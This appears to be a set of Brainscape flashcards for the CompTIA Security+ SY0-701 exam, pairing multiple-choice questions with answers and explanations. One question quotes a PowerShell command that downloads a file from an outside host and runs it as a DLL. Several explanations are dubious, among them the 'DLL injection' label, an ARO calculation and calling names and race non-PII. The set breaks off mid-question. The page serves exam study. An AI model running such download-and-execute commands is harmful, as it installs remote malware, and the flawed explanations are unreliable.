Brainscape's Knowledge GenomeTM


Top Flashcards (Certified)
All Flashcards

CompTIA Sec+ SY0-701 > CompTIA SEC+ SY0-701 Exam V2 > Flashcards

CompTIA SEC+ SY0-701 Exam V2 Flashcards

(88 cards)

Start Studying
1
Q

Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking

Intrusion Detection System (IDS)
Web Application Firewall (WAF)
Domain Name System (DNS)
Transport Layer Security (TLS)

A

TLS inspection

TLS (Transport Layer Security) is a protocol that is used to encrypt data sent over HTTPS (Hypertext Transfer Protocol Secure). In order for an intrusion detection system (IDS) and a web application firewall (WAF) to be effective on HTTPS traffic, they must be able to inspect the encrypted traffic. TLS inspection allows the IDS and WAF to decrypt and inspect the traffic, allowing them to detect any malicious activity.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

A. RAID
B. UPS
C. NIC teaming
D. Load balancing

redundant array of independent disks (RAID)
Uninterruptible Power Supply (UPS)
Network Interface Card (NIC)

A

NIC teaming

NIC Teaming is a feature that allows a server to be connected to multiple network switches, providing redundancy and increased network availability. If one of the switches goes down, the server will still be able to send and receive data through one of the other switches.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Which of the following control types is patch management classified under?

A. Deterrent
B. Physical
C. Corrective
D. Detective

A

Corrective

Patch management is classified as a corrective control because it is used to correct vulnerabilities or weaknesses in systems and applications after they have been identified. It is a reactive approach that aims to fix problems that have already occurred rather than prevent them from happening in the first
place.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd. conf.
D. Network services are no longer running on the NAS

network-attached storage (NAS)
Secure Copy Protocol (SCP)
Trivial File Transfer Protocol (TFTP)
Secure Shell (SSH)

A

SSH was turned off instead of modifying the configuration file.

SSH is used to securely transfer files to the remote server and is required for SCP to work. Disabling SSH will prevent users from being able to use SCP to transfer files to the server. To enable SSH, the security engineer should modify the SSH configuration file (sshd.conf) and make sure that SSH is enabled.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

The findings in a consultant’s report indicate the most critical risk to the security posture from an incident response perspective is a lack of workstation and server investigation capabilities. Which of the following should be implemented to remediate this risk?

A. HIDS
B. FDE
C. NGFW
D. EDR

host-based intrusion detection system (HIDS)
Full-disk encryption (FDE)
next-generation firewall (NGFW)
Endpoint Detection and Response (EDR)

A

EDR

EDR solutions are designed to detect and respond to malicious activity on workstations and servers, and they provide a detailed analysis of the incident, allowing organizations to quickly remediate the threat.

EDR solutions can be used to detect malicious activity on endpoints, investigate the incident, and contain the threat. EDR solutions can also provide real-time monitoring and alerting for potential security events, as well as detailed forensic analysis for security incidents. Additionally, the text book recommends that organizations also implement a host-based intrusion detection system (HIDS) to alert them to malicious activity on their workstations and servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

The management team has requested that the security team implement 802.1X into the existing wireless network setup. The following requirements must be met:

  • Minimal interruption to the end user
  • Mutual certificate validation

Which of the following authentication protocols would meet these requirements?

A. EAP-FAST
B. PSK
C. EAP-TTLS
D. EAP-TLS

Flexible Authentication via Secure Tunneling (EAP-FAST)
Pre-Shared Key (PSK)
Extensible Authentication Protocol - Tunneled Transport Layer Security (EAP-TTLS)
Extensible Authentication Protocol - Transport Layer Security (EAP-TLS)

A

EAP-TLS

EAP-TLS (Extensible Authentication Protocol - Transport Layer Security) is an authentication protocol that uses certificates to provide mutual authentication between the client and the authentication server. It also allows for the encryption of user credentials, making EAP-TLS a secure and reliable
authentication protocol.

EAP-TLS is well-suited for wireless networks due to its mutual authentication capabilities and its ability to securely store credentials. It is also the preferred authentication protocol for 802.1X wireless networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Which of the following describes where an attacker can purchase DDoS or ransomware services?

A. Threat intelligence
B. Open-source intelligence
C. Vulnerability database
D. Dark web

Distributed Denial-of-Service (DDoS) Attack

A

Dark web

The best option to describe where an attacker can purchase DDoS or ransomware services is the dark web. The dark web is an anonymous, untraceable part of the internet where a variety of illicit activities take place, including the purchase of DDoS and ransomware services

Attackers can purchase these services anonymously and without the risk of detection or attribution. Additionally, the text book recommends that organizations monitor the dark web to detect any possible threats or malicious activity.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

A. pcap reassembly
B. SSD snapshot
C. Volatile memory imaging
D. Extract from checksums

Hypertext transfer protocol secure (HTTPS)
Packet capture (PCAP)
Solid State Drive (SSD)

A

Volatile memory imaging

The best technique for the digital forensics team to use to obtain a sample of the malware binary is to image volatile memory. Volatile memory imaging is a process of collecting a snapshot of the contents of a computer’s RAM, which can include active malware programs.

Random access memory (RAM)

Volatile memory imaging can be used to capture active malware programs that are running in memory, but have not yet been committed to disk. This technique is especially useful in cases where the malware is designed to self-destruct or erase itself from the disk after execution.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A security administrator is managing administrative access to sensitive systems with the following requirements:

  • Common login accounts must not be used for administrative duties.
  • Administrative accounts must be temporal in nature.
  • Each administrative account must be assigned to one specific user.
  • Accounts must have complex passwords.
  • Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?

A. ABAC
B. SAML
C. PAM
D. CASB

Attribute-based access control (ABAC)
Security Assertion Markup Language (SAML)
Privileged access management (PAM)
Cloud Access Security Broker (CASB)

A

Privileged Access Management (PAM)

PAM is a solution that enables organizations to securely manage users’ accounts and access to sensitive systems. It allows administrators to create unique and complex passwords for each user, as well as assign each account to a single user for administrative duties. PAM also provides audit trails and logging capabilities, allowing administrators to monitor user activity and ensure that all systems are secure.

PAM is the most comprehensive way to control and monitor privileged accounts.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Physical access to the organization’s servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization’s hardware. Which of the following controls is described in this scenario?

A. Compensating
B. Deterrent
C. Preventive
D. Detective

A

Preventive

The scenario describes preventive controls, which are designed to stop malicious actors from gaining access to the organization’s servers. This includes using multiple access points, such as a lobby, an access control vestibule, and multiple doors leading to the server floor, as well as caging the
organization’s hardware.

Preventive controls are “designed to stop malicious actors from performing a malicious activity or gaining access to an asset.” These controls can include technical solutions, such as authentication and access control systems, physical security solutions, such as locks and barriers, and administrative solutions such as policy enforcement.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

A company would like to protect credit card information that is stored in a database from being exposed and reused. However, the current POS system does not support encryption. Which of the following would be BEST suited to secure this information?

A. Masking
B. Tokenization
C. DLP
D. SSL/TLS

Point-of-sale (POS)
Data Loss Prevention (DLP)
Secure Sockets Layer and Transport Layer Security (SSL/TLS)

A

Tokenization

Tokenization replaces sensitive data with non-sensitive data, such as a unique identifier. This means that the data is still present in the system, but the sensitive information itself is replaced with the token. Tokenization is more secure than masking, which only obscures the data but does not eliminate it. DLP is not suitable for this task, as it is designed to prevent the loss or leakage of data from the system. SSL/TLS can be used to secure the transmission of data, but it cannot prevent the data itself from being exposed or reused.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company’s web application. Which of the following cloud concepts would be BEST for these requirements?

A. SaaS
B. VDI
C. Containers
D. Microservices

Software as a Service (SaaS)
Virtual Desktop Infrastructure (VDI)

A

Containers

Containers are a type of virtualization technology that allow applications to run in a secure, isolated environment on a single host. They can be quickly scaled up or down as needed, making them an ideal solution for unpredictable loads. Additionally, containers are designed to be lightweight and portable, so they can easily be moved from one host to another.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

A user is trying to upload a tax document, which the corporate finance department requested, but a security program is prohibiting the upload. A security analyst determines the file contains Pll, which of the following steps can the analyst take to correct this issue?

A. Create a URL filter with an exception for the destination website.
B. Add a firewall rule to the outbound proxy to allow file uploads
C. Issue a new device certificate to the user’s workstation.
D. Modify the exception list on the DLP to allow the upload

A

Modify the exception list on the DLP to allow the upload

Data Loss Prevention (DLP) policies are used to identify and protect sensitive data, and often include a list of exceptions that allow certain types of data to be uploaded or shared. By modifying the exception list on the DLP, the security analyst can allow the tax document to be uploaded without compromising the security of the system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources. Which of the following should the security team do?

A. Identify rogue access points.
B. Check for channel overlaps.
C. Create heat maps.
D. Implement domain hijacking.

A

Identify rogue access points.

To secure the wireless perimeter of its physical facilities, the corporate security team should focus on identifying rogue access points, which are unauthorized access points that have been set up by employees or outsiders to bypass security controls. By identifying and removing these rogue access
points, the team can ensure that only authorized users can access corporate resources through the wireless network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

An employee received an email with an unusual file attachment named Updates.Lnk. A security analysts reverse engineering what the file does and finds that it executes the following script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI
https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe
$env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A Powershell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

Dynamic Link Library (DLL)

A

A Powershell code is performing a DLL injection.

A PowerShell code that uses rundll32.exe to execute a DLL file is performing a DLL injection attack. This is a type of code injection attack that exploits the Windows process loading mechanism.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is MOST likely the cause for the high number of findings?

A. The vulnerability scanner was not properly configured and generated a high number of false positives.
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

A

The vulnerability scanner was not properly configured and generated a high number of false positives.

The most likely cause for the high number of findings is that the vulnerability scanner was not properly configured and generated a high number of false positives. False positive results occur when a vulnerability scanner incorrectly identifies a non-vulnerable system or application as being vulnerable. This can happen due to incorrect configuration, over-sensitive rule sets, or outdated scan databases.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity

Power Distribution Unit (PDU)
Uninterruptible Power Supplies (UPS)

A

Installing a managed PDU

Installing a managed PDU is the most appropriate option to mitigate the issue without compromising the number of outlets available. A managed Power Distribution Unit (PDU) helps monitor, manage, and control power consumption at the rack level. By installing a managed PDU, the security team will have greater visibility into power usage in the network rack, and they can identify and eliminate unauthorized devices that consume excessive power from empty outlets.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A web server log contains two million lines. A security analyst wants to obtain the next 500 lines starting from line 4,600. Which of the following commands will help the security analyst to achieve this objective?

A. cat webserver.log | head -4600 | tail +500 |
B. cat webserver.log | tail -1995400 | tail -500 |
C. cat webserver.log | tail -4600 | head -500 |
D. cat webserver.log | head -5100 | tail -500 |

A

cat webserver.log | head -5100 | tail -500 |

The cat command displays the contents of a file, the head command displays the first lines of a file, and the tail command displays the last lines of a file. To display a specific number of lines from a file, you can use a minus sign followed by a number as an option for head or tail. For example, head -10
will display the first 10 lines of a file. To obtain the next 500 lines starting from line 4,600, you need to use both head and tail commands.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer wants a tool that can monitor for changes to key files and network traffic for the device. Which of the following tools should the engineer select?

A. HIDS
B. AV
C. NGF-W
D. DLP

Host Intrusion Detection System (HIDS)
Anti-virus Software (AV)
next-generation firewall (NGFW)

A

HIDS

The security engineer should select a Host Intrusion Detection System (HIDS) to address the concern. HIDS monitors and analyzes the internals of a computing system, such as key files and network traffic, for any suspicious activity. Unlike antivirus software (AV), which relies on known signatures of
malware, HIDS can detect anomalies, policy violations, and previously undefined attacks by monitoring system behavior and the network traffic of the device.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

A. Vulnerability scanner
B. Open-source intelligence
C. Packet capture
D. Threat feeds

A

Threat feeds

Threat feeds, also known as threat intelligence feeds, are a source of information about current and emerging threats, vulnerabilities, and malicious activities targeting organizations. Security analysts use threat feeds to gather information about attacks and threats targeting their industry or sector. These feeds are typically provided by security companies, research organizations, or industry-specific groups. By using threat feeds, analysts can identify trends, patterns, and potential threats that may target their own organization, allowing them to take proactive steps to protect their systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A cybersecurity analyst needs to adopt controls to properly track and log user actions to an individual. Which of the following should the analyst implement?

A. Non-repudiation
B. Baseline configurations
C. MFA
D. DLP

Multi-Factor Authentication (MFA)
Data Loss Prevention (DLP)

A

Non-repudiation

Non-repudiation is the process of ensuring that a party involved in a transaction or communication cannot deny their involvement. By implementing non-repudiation controls, a cybersecurity analyst can properly track and log user actions, attributing them to a specific individual. This can be achieved through methods such as digital signatures, timestamps, and secure logging mechanisms.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A company would like to move to the cloud. The company wants to prioritize control and security over cost and ease of management. Which of the following cloud models would best suit this company’s priorities?

A. Public
B. Hybrid
C. Community
D. Private

A

Private

A private cloud model would best suit the company’s priorities of control and security over cost and ease of management. In a private cloud, the infrastructure is dedicated to a single organization, providing greater control over the environment and the ability to implement strict security measures. This is in contrast to public, community, or hybrid cloud models, where resources are shared among multiple organizations, potentially compromising control and security. While private clouds can be more expensive and more difficult to manage, they have the highest level of control and security for the company.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

A. DLP
B. TLS
C. AV
D. IDS

Data Loss Prevention (DLP)
Transport Layer Security (TLS)
Anti-Virus Software (AV)
Intrusion Detection System (IDS)

A

DLP

DLP stands for data loss prevention, which is a set of tools and processes that aim to prevent unauthorized access, use, or transfer of sensitive data. DLP can help mitigate the risk of data exfiltration by disgruntled employees or external attackers by monitoring and controlling data flows across endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, transfer, or upload sensitive data to a USB drive or other removable media based on predefined policies and rules.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

A company has hired an assessment team to test the security of the corporate network and employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware of this exercise, and very little information has been provided to the assessors. Which of the following is taking place?

A. A red-team test
B. A white-team test
C. A purple-team test
D. A blue-team test

A

A red-team test

A red-team test is a type of security assessment that simulates a real-world attack on an organization’s network, systems, applications, and people. The goal of a red-team test is to evaluate the organization’s security posture, identify vulnerabilities and gaps, and test the effectiveness of its detection and response capabilities. A red-team test is usually performed by a group of highly skilled security professionals who act as adversaries and use various tools and techniques to breach the organization’s defenses. A red-team test is often conducted without the knowledge or consent of most of the organization’s staff, except for a few senior executives who authorize and oversee the exercise.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would most likely contain language that would prohibit this activity? A. NDA B. BPA C. AUP D. SLA ## Footnote Non-Disclosure Agreement (NDA) Business partnership agreements (BPA) Acceptable-Use Policy (AUP) service level agreement (SLA)
AUP AUP stands for acceptable use policy, which is a document that defines the rules and guidelines for using an organization’s network, systems, devices, and resources. An AUP typically covers topics such as authorized and unauthorized activities, security requirements, data protection, user responsibilities, and consequences for violations. An AUP can help prevent non-work-related software installation on company-issued devices by clearly stating what types of software are allowed or prohibited, and what actions will be taken if users do not comply with the policy.
25
A company recently implemented a patch management policy; however, vulnerability scanners are still flagging several hosts even after the completion of the patch process. Which of the following is the most likely cause of the issue? A. The vendor firmware lacks support. B. Zero-day vulnerabilities are being discovered. C. Third-party applications are not being patched. D. Code development is being outsourced.
Third-party applications are not being patched. Third-party applications are applications that are developed and provided by external vendors or sources, rather than by the organization itself. Third-party applications may introduce security risks if they are not properly vetted, configured, or updated. One of the most likely causes of vulnerability scanners flagging several hosts after the completion of the patch process is that third-party applications are not being patched. Patching is the process of applying updates or fixes to software to address bugs, vulnerabilities, or performance issues. Patching third-party applications is essential for maintaining their security and functionality, as well as preventing attackers from exploiting known flaws.
25
A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Select two). A. Chain of custody B. Tags C. Reports D. Time stamps E. Hash values F. Time offset
Time stamps & Time offset A server farm’s logs are records of events that occur on a group of servers that provide the same service or function. Logs can contain information such as date, time, source, destination, message, error code, and severity level. Logs can help administrators monitor the performance, security, and availability of the servers and troubleshoot any issues. To determine the sequence of a server farm’s logs, the administrator should consider the following factors: Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can help administrators sort and correlate events across different servers based on chronological order. However, time stamps alone may not be sufficient to determine the sequence of events if the servers have different time zones or clock settings. Time offset: Time offset is the difference between the local time of a server and a reference time, such as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help administrators adjust and synchronize the time stamps of different servers to a common reference time and eliminate any discrepancies caused by time zones or clock settings.
26
A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be best to help the organization's executives determine their next course of action? A. An incident response plan B. A communication plan C. A disaster recovery plan D. A business continuity plan
A business continuity plan A business continuity plan (BCP) is a document that outlines how an organization will continue its critical functions during and after a disruptive event, such as a natural disaster, pandemic, cyberattack, or power outage. A BCP typically covers topics such as business impact analysis, risk assessment, recovery strategies, roles and responsibilities, communication plan, testing and training, and maintenance and review. A BCP can help the organization’s executives determine their next course of action by providing them with a clear framework and guidance for managing the crisis and resuming normal operations.
27
A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator most likely use to confirm the suspicions? A. Nmap B. Wireshark C. Autopsy D. DNSEnum
Nmap Nmap is a tool that is used to scan IP addresses and ports in a network and to detect installed applications. Nmap can help a security administrator determine the services running on a server by sending various packets to the target and analyzing the responses. Nmap can also perform various tasks such as OS detection, version detection, script scanning, firewall evasion, and vulnerability scanning.
28
While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method? A. Data loss prevention B. Blocking IP traffic at the firewall C. Containerization D. File integrity monitoring
Data loss prevention Data loss prevention (DLP) is a set of tools and processes that aim to prevent unauthorized access, use, or transfer of sensitive data. DLP can help reduce the risk of further exfiltration using file storage sites on the internet by monitoring and controlling data flows across endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, upload, or download sensitive data to or from file storage sites based on predefined policies and rules.
29
An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%. Which of the following would best describe the estimated number of devices to be replaced next year? A. SLA B. ARO C. RPO D. SLE ## Footnote service level agreement (SLA) annualized rate of occurrence (ARO) Recovery point objective (RPO) Single Loss Expectancy (SLE)
ARO ARO stands for annualized rate of occurrence, which is a metric that estimates how often a threat event will occur within a year. ARO can help an IT manager estimate the mobile device budget for the upcoming year by multiplying the number of devices replaced in the previous year by the percentage increase of replacement over the last five years. For example, if 100 devices were replaced in the previous year and the replacement rate increased by 10% each year for the last five years, then the estimated number of devices to be replaced next year is 100 x (1 + 0.1)^5 = 161.
30
An engineer is using scripting to deploy a network in a cloud environment. Which of the following describes this scenario? A. SDLC B. VLAN C. SDN D. SDV ## Footnote software development lifecycle (SDLC) virtual local area network (VLAN) software-defined networking (SDN) Software-Defined Visibility (SVD)
SDN SDN stands for software-defined networking, which is an approach to networking that uses software-based controllers or application programming interfaces (APIs) to communicate with underlying hardware infrastructure and direct traffic on a network. SDN decouples the network control plane from the data plane, enabling centralized management and programmability of network resources. SDN can help an engineer use scripting to deploy a network in a cloud environment by allowing them to define and automate network policies, configurations, and services through software commands.
31
A candidate attempts to go to http://comptia.com but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following best describes this type of attack? A. Reconnaissance B. Impersonation C. Typosquatting D. Watering-hole
Typosquatting Typosquatting is a type of cyberattack that involves registering domains with deliberately misspelled names of well-known websites. The attackers do this to lure unsuspecting visitors to alternative websites, typically for malicious purposes. Visitors may end up at these alternative websites by inadvertently mistyping the name of popular websites into their web browser or by being lured by a phishing scam. The attackers may emulate the look and feel of the legitimate websites and trick users into entering sensitive information or downloading malware
32
A police department is using the cloud to share information with city officials. Which of the cloud models describes this scenario? A. Hybrid B. Private C. Public D. Community
Community A community cloud model describes a scenario where a cloud service is shared among multiple organizations that have common goals, interests, or requirements. A community cloud can be hosted by one of the organizations, a third-party provider, or a combination of both. A community cloud can offer benefits such as cost savings, security, compliance, and collaboration. A police department using the cloud to share information with city officials is an example of a community cloud model.
33
Which of the following security design features can help a development team analyze the deletion or editing of data sets without affecting the original the copy? A. Stored procedures B. Code reuse C. Version control D. Continunus
Version control Version control is a solution that can help a development team analyze the deletion or editing of data sets without affecting the original copy. Version control is a system that records changes to a file or set of files over time so that specific versions can be recalled later. Version control can help developers track and manage changes to code, data, or documents, as well as collaborate with other developers and resolve conflicts.
34
An employee's laptop was stolen last month. The laptop was returned, a cybersecurity analyst retrieved the laptop and has since started the cybersecurity incident checklist process. Four incident handlers are responsible for executing the checklist. Which of the following best describes the process for evidence collection assurance? A. Time stamp B. Chain of custody C. Admissibility D. Legal hold
Chain of custody Chain of custody is a process that documents the chronological and logical sequence of custody, control, transfer, analysis, and disposition of materials, including physical or electronic evidence. Chain of custody is important to ensure the integrity and admissibility of evidence in legal proceedings. Chain of custody can help evidence collection assurance by providing proof that the evidence has been handled properly and has not been tampered with or contaminated.
35
Which of the following control types is patch management classified under? A. Deterrent B. Physical C. Corrective D. Detective
Corrective Patch management is a process that involves applying updates or fixes to software to address bugs, vulnerabilities, or performance issues. Patch management is classified under corrective control type, which is a type of control that aims to restore normal operations after an incident or event has occurred. Corrective controls can help mitigate the impact or damage caused by an incident or event and prevent it from happening again.
36
A major manufacturing company updated its internal infrastructure and just started to allow OAuth (Open Authorization) application to access corporate data. Data leakage is being reported. Which of following most likely caused the issue? A. Privilege creep B. Unmodified default C. TLS D. Improper patch management ## Footnote Transport Layer Security (TLS)
Privilege creep Privilege creep is the gradual accumulation of access rights beyond what an individual needs to do his or her job. In information technology, a privilege is an identified right that a particular end user has to a particular system resource, such as a file folder or virtual machine. Privilege creep often occurs when an employee changes job responsibilities within an organization and is granted new privileges. While employees may need to retain their former privileges during a period of transition, those privileges are rarely revoked and result in an unnecessary accumulation of access privileges. Privilege creep creates a security risk by increasing the attack surface and exposing sensitive data or systems to unauthorized or malicious users.
37
A company receives a "right to be forgotten" request to legally comply, the company must remove data related to the requester from its systems. Which of the following is the company most likely complying with? A. NIST CSF B. GDPR C. PCI DSS D. ISO 27001 ## Footnote General Data Protection Regulation (GDPR) National Institute of Standards and Technology Cyber Security Framework (NIST CSF) Payment Card Industry Data Security Standard (PCI DSS) International Organization for Standardization (ISO)
GDPR GDPR stands for General Data Protection Regulation, which is a law that regulates data protection and privacy in the European Union (EU) and the European Economic Area (EEA). GDPR also applies to the transfer of personal data outside the EU and EEA areas. GDPR grants individuals the right to request the deletion or removal of their personal data from an organization’s systems under certain circumstances. This right is also known as the “right to be forgotten” or the “right to erasure”. An organization that receives such a request must comply with it within a specified time frame, unless there are legitimate grounds for retaining the data.
38
A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in this documentation? (Select two). A. The order of volatility B. A forensics NDA C. The provenance of the artifacts D. The vendor's name E. The date and time F. A warning banner ## Footnote Non-Disclosure Agreement (NDA)
The provenance of the artifacts & The date and time A digital forensics chain-of-custody form is a document that records the chronological and logical sequence of custody, control, transfer, analysis, and disposition of digital evidence. A digital forensics chain-of-custody form should include the following information: The provenance of the artifacts: The provenance of the artifacts refers to the origin and history of the digital evidence, such as where, when, how, and by whom it was collected, handled, analyzed, or otherwise controlled. The date and time: The date and time refer to the specific moments when the digital evidence was collected, handled, analyzed, transferred, or disposed of by each person involved in the chain of custody.
39
Which of the following best describes when an organization utilizes a ready-to-use application from a cloud provider? A. IaaS B. SaaS C. PaaS D. XaaS ## Footnote Infrastructure as a service (IaaS) software as a service (SaaS) Platform as a service (PaaS) Anything as a service (XaaS)
SaaS SaaS stands for software as a service, which is a cloud computing model that provides ready-to-use applications over the internet. SaaS applications are hosted and managed by a cloud provider who also handles software updates, maintenance, security, and scalability. SaaS users can access the applications through a web browser or a mobile app without installing any software on their devices. SaaS applications are typically offered on a subscription or pay-per-use basis. ## Footnote Examples of SaaS applications include email services, online office suites, customer relationship management (CRM) systems, and video conferencing platforms.
40
A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives? A. WAF B. CASB C. VPN D. TLS ## Footnote Web Application Firewall (WAF) cloud access security broker (CASB) virtual private network (VPN) Transport Layer Security (TLS)
CASB CASB stands for cloud access security broker, which is a software tool or service that acts as an intermediary between users and cloud service providers. CASB can help protect data stored in cloud services by enforcing security policies and controls such as encryption, tokenization, authentication, authorization, logging, auditing, and threat detection. Tokenization is a process that replaces sensitive data with non-sensitive substitutes called tokens that have no intrinsic value. Tokenization can help prevent data leakage by ensuring that only authorized users can access the original data using a tokenization system.
41
Unauthorized devices have been detected on the internal network. The devices’ locations were traced to Ether ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network? A. NAC B. DLP C. IDS D. MFA ## Footnote network access control (NAC) Data Loss Prevention (DLP) Instrusion Detection System (IDS) Multi-Factor Authentication (MFA)
NAC NAC stands for network access control, which is a security solution that enforces policies and controls on devices that attempt to access a network. NAC can help prevent unauthorized devices from accessing the internal network by verifying their identity, compliance, and security posture before granting them access. NAC can also monitor and restrict the activities of authorized devices based on predefined rules and roles.
42
A junior human resources administrator was gathering data about employees to submit to a new company awards program. The employee data included job title, business phone number, location, first initial with last name, and race. Which of the following best describes this type of information? A. Sensitive B. Non-Pll C. Private D. Confidential ## Footnote non-personally identifiable information (Non-PII)
Non-Pll Non-PII stands for non-personally identifiable information, which is any data that does not directly identify a specific individual. Non-PII can include information such as job title, business phone number, location, first initial with last name, and race. Non-PII can be used for various purposes, such as statistical analysis, marketing, or research. However, non-PII may still pose some privacy risks if it is combined or linked with other data that can reveal an individual’s identity.
43
A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts the CSIRT, the team tells the engineer to immediately disconnect the network cable and to not do anything else. Which of the following is most likely the reason for this request? A. The CSIRT thinks an insider threat is attacking the network B. Outages of business-critical systems cost too much money C. The CSIRT does not consider the systems engineer to be trustworthy D. Memory contents including files and malware are lost when the power is turned off ## Footnote Computer Incident Response Team (CSIRT)
Memory contents including files and malware are lost when the power is turned off Memory contents including files and malware are lost when the power is turned off. This is because memory is a volatile storage device that requires constant power to retain data. If a system has been compromised and is being used to exfiltrate data to a competitor, the CSIRT may want to preserve the memory contents for forensic analysis and evidence collection. Therefore, the CSIRT may tell the engineer to immediately disconnect the network cable and not do anything else to prevent further data loss or tampering.
44
Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface? A. OWASP B. Obfuscation/camouflage C. Test environment D. Prevention of information exposure ## Footnote Open Web Application Security Project (OWASP)
Prevention of information exposure Preventing information exposure is a secure application development concept that aims to block verbose error messages from being shown in a user’s interface. Verbose error messages are detailed messages that provide information about errors or exceptions that occur in an application. Verbose error messages may reveal sensitive information about the application’s structure, configuration, logic, or data that could be exploited by attackers. Therefore, preventing information exposure involves implementing proper error handling mechanisms that display generic or user-friendly messages instead of verbose error messages.
45
While reviewing the /etc/shadow file, a security administrator notices files with the same values. Which of the following attacks should the administrator be concerned about? A. Plaintext B. Birthdat C. Brute-force D. Rainbow table
Rainbow table Rainbow table is a type of attack that should concern a security administrator when reviewing the /etc/shadow file. The /etc/shadow file is a file that stores encrypted passwords of users in a Linux system. A rainbow table is a precomputed table of hashes and their corresponding plaintext values that can be used to crack hashed passwords. If an attacker obtains a copy of the /etc/shadow file, they can use a rainbow table to find the plaintext passwords of users.
46
Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges? A. Lessons learned B. Identification C. Simulation D. Containment
Lessons learned Lessons learned is a process that would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges. Lessons learned is a process that involves reviewing and evaluating the incident response exercise to identify what went well, what went wrong, and what can be improved. Lessons learned can help an organization enhance its incident response capabilities, address any gaps or weaknesses, and update its incident response plan accordingly.
47
Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following plans would fulfill this requirement? A. Communication plan B. Disaster recovery plan C. Business continuity plan D. Risk plan
